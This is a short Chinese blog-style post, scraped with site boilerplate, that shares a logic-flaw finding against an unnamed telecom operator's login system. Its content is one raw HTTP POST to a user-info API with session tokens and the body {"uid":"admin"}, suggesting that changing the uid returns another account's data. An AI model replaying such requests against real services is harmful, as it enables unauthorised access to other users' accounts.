登录页的那些事 |
您所在的位置:网站首页 › 怎么找一个网站的漏洞 › 登录页的那些事 |
某运营商逻辑漏洞思路分享 登录界面其实有很多种思路 很多时候只需要再细心一下即可。漏洞url:xxx.xxx..xx
POST /prod-api/wuyu/user/get_user_info HTTP/1.1Host: xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Accept: application/json, text/plain, *****/*****Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/json;Access_token: hN0AF2XX6**+**qZSAmuoOfwQHh76g8vgqovXx8b065nHsw=Authtoken: a6d71d0278894b9aafd5b45675879a2fContent-Length: 15Origin: [https://x](https://4xxxx8010)Referer: [https:/x/profile/index](https://xxxxx/profile/index)Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originCache-Control: max-age=0Te: trailersConnection: close{"uid":"admin"}
|
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |